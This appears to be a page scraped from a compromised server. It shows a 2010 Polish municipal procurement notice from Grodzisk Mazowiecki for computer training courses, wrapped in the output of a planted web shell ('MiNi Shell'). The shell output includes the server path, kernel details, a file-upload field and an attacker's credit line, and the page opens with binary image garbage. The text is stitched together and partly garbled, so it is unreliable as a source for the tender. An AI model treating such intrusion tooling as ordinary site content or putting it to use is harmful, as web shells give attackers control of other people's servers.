JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100222/35909-N-2010.html

<p class="kh_header"><b>Grodzisk Mazowiecki: Przygotowanie i realizacja szkoleń komputerowych realizowanych w ramach projektu Domowy dostęp do Internetu drogą do budowania społeczeństwa informacyjnego współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego. ZP-341/27/2010</b><br>
<b>Numer ogłoszenia: 35909 - 2010; data zamieszczenia: 22.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grodzisk Mazowiecki , ul. Kościuszki 32A, 05-825 Grodzisk Mazowiecki, woj. mazowieckie, tel. 022 7555146, faks 022 7555327.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.grodzisk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i realizacja szkoleń komputerowych realizowanych w ramach projektu Domowy dostęp do Internetu drogą do budowania społeczeństwa informacyjnego współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego. ZP-341/27/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szkolenia będą realizowane w ramach projektu Domowy dostęp do Internetu drogą do budowania społeczeństwa informacyjnego, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego. 

I. Wymagania dotyczące organizacji szkoleń
1.	Liczba uczestników (BO): 100 osób.
2.	Liczba grup szkoleniowych: 10 grup szkoleniowych (po ok. 10 osób w grupie)
3.	Liczba godzin: 80 godz. na jedną grupę szkoleniową (20 dni szkoleniowych na jedną grupę szkoleniową)
4.	Dzień szkoleniowy: 4 godziny (4 x 60min.) + 15 min na przerwy szkoleniowe dla uczestników
5.	W tym samym tygodniu kalendarzowym (poniedziałek-niedziela) dla danej (jednej) grupy szkoleniowej zostaną zrealizowane nie więcej niż 2 dni szkoleniowe.
6.	Jeżeli Wykonawca przewiduje 2 dni szkoleniowe w tym samym tygodniu dla jednej grupy szkoleniowej to: jeden dzień szkoleniowy będzie realizowany w dzień pracujący (tj. poniedziałek - piątek), a drugi dzień szkoleniowy będzie realizowany w weekend (tj. sobota-niedziela) - w następujących ramach czasowych:
a)	poniedziałek - piątek: 17.00-21.15,
b)	sobota: 8.00-21.00,
c)	niedziela: 12.00-21.00.
W przypadku organizacji szkoleń w wymiarze 1 dnia w tygodniu obowiązują te same ramy czasowe.
7.	Maksymalny czas realizacji wszystkich dni szkoleniowych dla wszystkich grup szkoleniowych objętych zamówieniem nie dłuższy niż 20 tygodni (20 x 7dni = 140 dni) od dnia realizacji przez Wykonawcę pierwszego dnia szkoleniowego w ramach zamówienia.
8.	Sale wykładowe zapewnia Wykonawca.
9.	Miejsce realizacji szkoleń: Miasto Grodzisk Mazowiecki.
10.	Sale wykładowe muszą spełniać wymagania umożliwiające realizację przedmiotu zamówienia, w szczególności:
a)	posiadać liczbę stanowisk komputerowych z dostępem do Internetu równą liczbie kursantów + 2 stanowiska rezerwowe (sprzęt komputerowy nie starszy niż 3 lata) na jedną grupę szkoleniową/ jedną salę wykładową,
b)	w sali wykładowej muszą być zapewnione warunki, analogicznie jak dla stanowiska pracy z komputerem według właściwych przepisów prawnych, w szczególności odpowiednia temperatura, wentylacja i oświetlenie sali,
c)	wyposażenie sal wykładowych musi być zgodne z właściwymi przepisami BHP,
d)	posiadać zaplecze sanitarne z odpowiednią do liczby uczestników liczbą stołów i krzeseł,
e)	sala wykładowa musi być utrzymywana w czystości.
11.	 Pierwszy dzień szkoleniowy zostanie zrealizowany przez Wykonawcę nie później niż 30 dni od zawarcia umowy w sprawie zamówienia publicznego.
12.	Wykonawca przedłoży harmonogram realizacji zamówienia wraz ze wzorem sprawozdania miesięcznego oraz końcowego w ciągu 14 dni od  zawarcia umowy w sprawie zamówienia publicznego, który podlega zatwierdzeniu przez Zamawiającego w ciągu 7 dni roboczych.
13.	Harmonogram zawiera w szczególności określenie dat i godzin realizacji poszczególnych dni szkoleniowych w rozbiciu na poszczególne grupy szkoleniowe.
14.	Wykonawca wyda kursantom zaświadczenia i lub certyfikaty w terminie do 30 dni od zakończenia szkoleń. Wydanie wszystkich zaświadczeń i lub certyfikatów upoważnia Wykonawcę do złożenia sprawozdania końcowego.

II. Obowiązki Wykonawcy
Do obowiązków Wykonawcy związanych z realizacją zamówienia należy:
1.	Obsługa administracyjna szkoleń i uczestników szkoleń, w tym:
a)	rejestrowanie uczestników i udzielaniu informacji o zajęciach, w tym wszelki kontakt telefoniczny z uczestnikami szkoleń i służbami Zamawiającego (dane kontaktowe zostaną przekazane Wykonawcy po podpisaniu umowy),
b)	Wykonawca zobowiązany jest do prowadzenia list obecności uczestników, zawierającej w stosunku do każdego uczestnika: imię i nazwisko, telefon i adres e-mail, podpis.
c)	uczestnictwo w szkoleniu powinno być potwierdzone przez uczestnika własnym podpisem, złożonym na udostępnionej przez Wykonawcę liście. 
d)	przyjmowanie zaświadczeń lekarskich od uczestników w przypadku nieobecności na zajęciach,
e)	opracowanie sprawozdań: miesięcznych oraz końcowego z realizacji zamówienia. (wzór do akceptacji Zamawiającego)
2.	Przeprowadzenie testu sprawdzającego początkowy i końcowy poziom wiedzy uczestników szkoleń.
3.	Przeprowadzenie podziału uczestników szkoleń na grupy według testu kompetencji i wiedzy.
4.	Bieżące raportowanie do służb Zamawiającego o występujących problemach i przeszkodach w realizacji zamówienia,
5.	Obowiązek modyfikacji harmonogramu na wniosek Zamawiającego, w tym także uzgadnianie harmonogramu, ew. zmian w zakresie tematycznym zajęć, treści testów i ankiet z przedstawicielem Wykonawcy.
6.	Zbadanie poziomu zadowolenia uczestników z poziomu realizacji szkoleń w połowie oraz na koniec okresu realizacji szkoleń, wraz z jego analizą i opracowaniem wyników z przeprowadzonego badania w formie tabelarycznej oraz podanie wartości w postaci średniej arytmetycznej.
7.	Wykonawca udokumentuje fotograficznie przebieg szkoleń odrębnie dla każdej grupy szkoleniowej i przekaże zdjęcia na nośniku CD DVD Zamawiającemu niezwłocznie po zakończeniu szkoleń z daną grupą. Wykonawca wykona przynajmniej 5 zdjęć każdej z grup szkoleniowych (rozpoczęcie i przebieg).
8.	Wykonawca przygotuje i wyda uczestnikom zaświadczenie i lub certyfikat ukończenia kursu, po akceptacji treści i formy przez Zamawiającego. 
9.	Ubezpieczenie uczestników szkoleń w zakresie NW.
10.	Wykonawca przenosi w związku z realizacją zamówienia autorskie prawa majątkowe wraz z prawami zależnymi do wszystkich materiałów szkoleniowych, tekstów zatwierdzonych przez Zamawiającego oraz elementów graficznych (zdjęć, rysunków, grafik) na Zamawiającego.
11.	Kontakty Zamawiającego z Wykonawcą będą odbywać się przy użyciu poczty elektronicznej oraz telefonicznie lub faksem. W specyficznych sytuacjach, gdzie taki kontakt nie będzie wystarczający, Wykonawca będzie zobowiązany do osobistego stawienia się w siedzibie Zamawiającego, jeśli Zamawiający uzna to za konieczne.

III. Materiały szkoleniowe i pomoce
1.	Wykonawca zapewnia materiały szkoleniowe i ponosi koszty wszelkich druków i opracowań materiałów niezbędnych dla realizacji zamówienia.
2.	Wykonawca zapewnia dla uczestników szkoleń: po 2 szt. następujących materiałów piśmiennych: długopisy, ołówki z gumką, bruliony zeszyty, oraz: pen-drive 2 GB, podręcznik podręczniki tematycznie związane z zakresem zajęć.
3.	Każdy ze 100 uczestników szkoleń powinien otrzymać zestaw materiałów szkoleniowych, dydaktycznych i piśmienniczych. 
4.	Wykonawca jest odpowiedzialny za przygotowanie: list obecności, ankiet ewaluacyjnych, testów.
5.	 Wykonawca oznaczy wszystkie materiały zgodnie z wytycznymi ds. promocji. 
Przewodnik w zakresie promocji projektów finansowanych w ramach Programu Operacyjnego Innowacyjna Gospodarka, 2007 - 2013 dla beneficjentów i instytucji zaangażowanych we wdrażanie Programu dostępny jest na stronie internetowej pod adresem: zał. nr 1 do SIWZ
IV. Zakres tematyczny szkoleń i metodologia
1.	Szkolenia zostaną przeprowadzone w formie wykładów lub ćwiczeń, jednak wykłady powinny stanowić nie więcej niż 20% wszystkich dni szkoleniowych dla danej grupy szkoleniowej.
2.	Szkolenia zostaną przeprowadzone na 2 poziomach zaawansowania: podstawowym i średniozaawansowanym.
3.	Zakres tematyczny szkoleń:
	Obydwie grupy obowiązkowo:
- nauka obsługi płyty diagnostycznej firmy Dell
- nauka reinstalacji: systemu operacyjnego Windows XP Professional PL wraz ze sterownikami, oprogramowania Microsoft Office Professional 2007, oprogramowania antywirusowego Panda Antivirus Pro 2009 oraz modemów ZTEMF636 i AnyDATA ADU-635 WA.    

a)	Grupa podstawowa
Podstawy obsługi komputera
- schemat podłączenia komputera i urządzeń peryferyjnych
- podstawowy schemat budowy komputera
Windows
 - skróty klawiszowe w środowisku Windows
-  uruchamianie oraz logowanie do komputera
- rozeznanie się w Menu Start oraz rozeznanie ikon na pulpicie
- funkcje ekranu (tło, ustawiania rozdzielczości itp.)
- usuwanie, wycinanie, wklejanie, kopiowanie , tworzenie folderów
- podstawowa obsługa panelu sterowania
- ustawianie godziny i daty
- instalowanie oraz zasady instalacji aplikacji w środowisku Windows
- tworzenie nowych profilów użytkownika
MS Word 
- formatowanie akapitów
- formatowanie tekstu: czcionek, strony
- wykorzystanie stylów oraz motywów
- wzbogacanie dokumentów poprzez umieszczanie obiektów graficznych
MS Excel
Podstawy programu Excel
- wprowadzanie i edycja danych, wybieranie, wyszukiwanie komórek i grup komórek
- kopiowanie, wklejanie, wypełnianie komórek i zakresów
- wstawianie i praca z prostymi obiektami (grafika, ramka)
- nazywanie komórek i zakresów 
MS Power Point
- tworzenie prezentacji
- tworzenie szablonów
- odtwarzanie dźwięków
- odtwarzanie filmu
Microsoft Outlook
- zakładanie oraz konfigurowanie kont pocztowych
- tworzenie folderów, podfolderów w skrzynkach nadawczych, odbiorczych
Internet
- tworzenie kont e-mail na darmowych portalach
- obsługa przeglądarek internetowych np. Mozilla, Internet Explorer, Opera, Google Chrome, funkcje przeglądarek i ich możliwości 
- instalacja wtyczek typu Flash, Video, Macromedia, Java oraz ich aktywacja
- obsługa programu antywirusowego Panda 2009 r. : aktywacja, bazy sygnatur wirusów, opcje firewalla, skanowanie podstawowe i zaawansowane oraz rozwiązywanie problemów w przypadku wykrycia szkodliwego oprogramowania

b)	Grupa średniozaawansowana
Windows
 - skróty klawiszowe w środowisku Windows
-  uruchamianie oraz logowanie do komputera
- rozeznanie się w Menu Start oraz rozeznanie ikon na pulpicie
- funkcje ekranu (tło, ustawiania rozdzielczości itp.)
- usuwanie, wycinanie, wklejanie, kopiowanie , tworzenie folderów
- podstawowa obsługa panelu sterowania
- ustawianie godziny i daty
- instalowanie oraz zasady instalacji aplikacji w środowisku Windows
- tworzenie nowych profilów użytkownika
Microsoft Outlook
- zakładanie oraz konfigurowanie kont pocztowych
- tworzenie folderów, podfolderów w skrzynkach nadawczych, odbiorczych
Internet
- tworzenie kont e-mail na darmowych portalach
- obsługa przeglądarek internetowych np. Mozilla, Internet Explorer, Opera, Google Chrome, funkcje przeglądarek i ich możliwości 
- instalacja wtyczek typu Flash, Video, Macromedia, Java oraz ich aktywacja
- obsługa programu antywirusowego Panda 2009 r. : aktywacja, bazy sygnatur wirusów, opcje firewalla, skanowanie podstawowe i zaawansowane oraz rozwiązywanie problemów w przypadku wykrycia szkodliwego oprogramowania
MS Word 
- formatowanie akapitów
- formatowanie tekstu: czcionek, strony
- wykorzystanie stylów oraz motywów
- wzbogacanie dokumentów poprzez umieszczanie obiektów graficznych
- automatyzacja najczęściej wykonywanie zadań podczas edycji tekstu
- tworzenie oraz formatowanie tabel. Łączenie i podział komórek w tabeli
- pola tekstowe (dodanie lub usunięcie pola tekstowego, edycja pola tekstowego). 
MS Excel
Podstawy programu Excel
- wprowadzanie i edycja danych, wybieranie, wyszukiwanie komórek i grup komórek
- kopiowanie, wklejanie, wypełnianie komórek i zakresów
- wstawianie i praca z prostymi obiektami (grafika, ramka)
- nazywanie komórek i zakresów 
-  formatowanie graficzne (typy danych i formatowanie według typu danych)
- komentarze: wstawianie, wygląd, edycja
Formuły
- podstawowe i najczęściej używane funkcje matematyczne
- funkcje finansowe
- wybrane funkcje pomocnicze (czasu i daty, tekstowe)
- funkcje logiczne
Formularze
Sortowanie danych i filtry
- wykorzystanie autofiltrów
Sumy częściowe
Praca z wykresami
- typy wykresów i określanie źródeł danych
- formatowanie wykresów
Drukowanie
- przygotowanie arkusza do druku
Zarządzanie skoroszytami
- tworzenie i organizacja skoroszytów
- odnośniki między skoroszytami
Tabele przestawne i wykresy przestawne
- sortowanie i filtrowanie wykresu przestawnego
Zarządzanie danymi
- formaty plików i ich charakterystyka 
- importowanie i eksportowanie danych
MS Power Point
- tworzenie prezentacji
- tworzenie szablonów
- odtwarzanie dźwięków
- odtwarzanie filmu
- tworzenie animacji
- dostosowanie pasków narzędzi i menu
MS Access
- wprowadzenie do pracy z bazami danych, praca na istniejących bazach danych
- menu i paski narzędzi
- tabele
MS Publisher
- omówienie programu
- praca z kreatorem
- formatowanie pola tekstowego
- operacje na obrazach
- samodzielne rysowanie obrazków
- wizytówki i zestawy papeterii osobistej
- kalendarze i karty okolicznościowe
- korespondencja seryjna
- drukowanie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.32.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 200.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Brak</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizowali co najmniej 3 usługi szkoleniowe z zakresu obsługi komputera i/lub Internetu, z zastrzeżeniem, że wartość każdej z nich musi wynosić co najmniej 80000,00 złotych brutto (a w przypadku, jeżeli wartość usługi została w umowie wyrażona w walucie obcej - wyrażona w złotych równowartość kwoty co najmniej 80000,00 złotych wg średniego kursu NBP z dnia zawarcia umowy 
o wykonanie usługi szkoleniowej)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Co najmniej 4 osoby, w tym min. 2 trenerów, posiadających wykształcenie wyższe (min. licencjat) o kierunku informatycznym, z których każdy przeprowadził min. 100 dni szkoleniowych w zakresie szkoleń z zakresu obsługi komputera i/lub Internetu);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 75.00</li>
<li>2 - Termin realizacji szkoleń - 25.00</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają  możliwość zmiany miejsca, terminu lub programu realizacji zamówienia. W takim przypadku Wykonawca zobowiązuje się poinformować z min. 7-dniowym wyprzedzeniem Zamawiającego oraz uczestników szkolenia o nowym terminie i miejscu realizacji zamówienia, przy czym nowe miejsce realizacji zamówienia nie może cechować niższy standard od miejsca, w którym odbywały się spotkania szkoleniowe. Zmiana jest dopuszczalna wyłącznie po akceptacji Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.grodzisk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Grodzisku Mazowieckim  ul. Kościuszki 32A, 05-825 Grodzisk Mazowiecki pok. nr 206 IIp..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2010 godzina 12:00, miejsce: Ofertę (1 egzemplarz oryginalny oraz kopię) należy złożyć w siedzibie Zamawiającego: Sala Obsługi Mieszkańców stanowisko ds. informacji, Urząd Miejski w Grodzisku Mazowieckim, ul. T. Kościuszki 32a..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Współfinansowane przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com